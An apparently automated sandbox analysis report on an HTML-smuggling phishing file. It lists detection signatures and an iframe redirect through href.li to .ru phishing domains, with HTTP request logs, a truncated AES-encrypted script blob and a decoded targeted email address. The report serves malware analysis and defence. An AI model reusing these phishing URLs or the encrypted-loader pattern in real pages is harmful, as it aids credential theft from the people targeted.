Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html

Overview

General Information

Sample name:27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html
Analysis ID:1524291
MD5:cde00cb2b65ee286fec3017beb953795
SHA1:eabfaa69c1e3b6a04d17c76987becd63b5b78076
SHA256:287691ade84c692b9ea3af2bee22096d13584c817fcb7c908c3c4c17c582aa5f
Tags:htmlhtmlsmugglinghtmlsmugglinguser-bartblaze
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
Multi AV Scanner detection for submitted file
Detected javascript redirector / loader
HTML IFrame injector detected
HTML Script injector detected
Suspicious Javascript code found in HTML file
HTML page contains hidden javascript code
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 5308 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 --field-trial-handle=2500,i,7935428339012205260,6274500483146043326,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.htmlReversingLabs: Detection: 15%

Phishing

barindex
Source: 27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.htmlHTTP Parser: Low number of body elements: 0
Source: file:///C:/Users/user/Desktop/27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html#c29udUBuc2RjaW5kaWEub3JnHTTP Parser: New IFrame, src: https://href.li/?https://9zg.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/#c29udUBuc2RjaW5kaWEub3Jn
Source: file:///C:/Users/user/Desktop/27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html#c29udUBuc2RjaW5kaWEub3JnHTTP Parser: New script, src: https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
Source: file:///C:/Users/user/Desktop/27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html#c29udUBuc2RjaW5kaWEub3JnHTTP Parser: New script, src: https://code.jquery.com/jquery-3.6.0.min.js
Source: file:///C:/Users/user/Desktop/27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html#c29udUBuc2RjaW5kaWEub3JnHTTP Parser: New script tag found
Source: 27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.htmlHTTP Parser: document.write
Source: file:///C:/Users/user/Desktop/27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html#c29udUBuc2RjaW5kaWEub3JnHTTP Parser: Base64 decoded: sonu@nsdcindia.org
Source: file:///C:/Users/user/Desktop/27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.htmlHTTP Parser: const u="zrpctvcxtnmht3xmzmfppbud8usuldgph5pida3f94vn6d+59neewgmrfdntf3einkzpxwnqd88du33mwtvyugrqkoukbmfh7/lzclm4zbg25odmf3dmdhfbyxtgl0g3o5kfpxsltctjr8unskxmdagtpkqhod/qsh3cl6ki9tocmxrerzcem6tbha9bf9spp5m18z9nq98ulsjjsqqsgplepbzd+7u7bbvbpb8mpqnatzsemd7mxuh5e0po0lsgv3lyqcalsbvqzwzssrnrqel0w9j9hjgm1bihdizfdc3phgp2khsojmrwlihfwmq92svnf37eclx4/smkqsvqzvwngtsrtnmqzzzbyuddvgu+/hq+ygeyq3vklnhbgluxzvtxxwal8xne+2skcpepkiyhgjywxr0xaipmwt9xrlup+/z0c0jx1kn+hmmdkha3v7kxxzbeq4ju3+re/iymwnmif9lwshsbp8dagghsdzlun/34s1iw+bqyqcgy7j48nzkea13xvf3skec8whpih9qzt2bnv3yo2g5makziwgr5jn2xyz+ssh8uckcnzd5v5sn9kunxqzvkmxuxffa6y+ajddnjiorwb5adl/hkwks3dgujzjj+j7twxxrph9/kdtssoj5u96x83hyyrnnfep/lwgt66x/321sle4kwdlp+608go4hjaflbj+sapczqtv/uno8mzu0syedyu1zmrzhet6xno6cv0cr4cjnv/zrxrptxpbreym5ilrtv14athl24qlhxmu4z0inmgfxivddnj8fadlktx5podwpwbfuj906lmbh/nyjdwv+kdt9l2uubevkgd6sm0hgu9pfkqqfdcsikdvgltxwsmarfzb2r11vmuxjtlrvfleml76tm12bqofsl53t0em2d9vxzw6fhgtr6vmecg8yokgx5hd9gaxcicusk03nz4tkzjjkkwytic/tj7hu2/vrr3g93/so0a767oufljl1yq7ndycoitia4xxmxfri...
Source: file:///C:/Users/user/Desktop/27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html#c29udUBuc2RjaW5kaWEub3JnHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html#c29udUBuc2RjaW5kaWEub3JnHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 87.248.119.252 87.248.119.252
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.24
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.24
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.24
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.24
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6cpszyOxeMS9Ozg&MD=OVEsnKgD HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?https://9zg.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/ HTTP/1.1Host: href.liConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /oBVboBDZoE8nn9Lnp8eBs/ HTTP/1.1Host: 9zg.aforenotedc.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://9zg.aforenotedc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://9zg.aforenotedc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://9zg.aforenotedc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://9zg.aforenotedc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://9zg.aforenotedc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc5d8159ce5185d&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc5d8159ce5185d&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/429523053:1727882942:AUCUgSR7kOf38UcLE0OuEHEx3RPGx3lhdnkziYW9qco/8cc5d8159ce5185d/77bf10bc9e9db0f HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cc5d8159ce5185d/1727884185696/IhqgAOPRuw5_jTL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cc5d8159ce5185d/1727884185696/IhqgAOPRuw5_jTL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8cc5d8159ce5185d/1727884185699/6a8443e730cca91fcc019fa43e2caa5d910210e3641f376d94025e69ea631d9c/8lClcaSHEBS81wq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/429523053:1727882942:AUCUgSR7kOf38UcLE0OuEHEx3RPGx3lhdnkziYW9qco/8cc5d8159ce5185d/77bf10bc9e9db0f HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/429523053:1727882942:AUCUgSR7kOf38UcLE0OuEHEx3RPGx3lhdnkziYW9qco/8cc5d8159ce5185d/77bf10bc9e9db0f HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /992955768393598TcoooKWMQFRRVTWFRRYLUCPRWPCDYMYFKPHJKQLEDFPAIMQBMIMJDUCSR HTTP/1.1Host: 3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://9zg.aforenotedc.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://9zg.aforenotedc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /992955768393598TcoooKWMQFRRVTWFRRYLUCPRWPCDYMYFKPHJKQLEDFPAIMQBMIMJDUCSR HTTP/1.1Host: 3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://9zg.aforenotedc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://9zg.aforenotedc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6cpszyOxeMS9Ozg&MD=OVEsnKgD HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: href.li
Source: global trafficDNS traffic detected: DNS query: 9zg.aforenotedc.ru
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: 3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru
Source: global trafficDNS traffic detected: DNS query: yahoo.com
Source: global trafficDNS traffic detected: DNS query: www.yahoo.com
Source: global trafficDNS traffic detected: DNS query: csp.yahoo.com
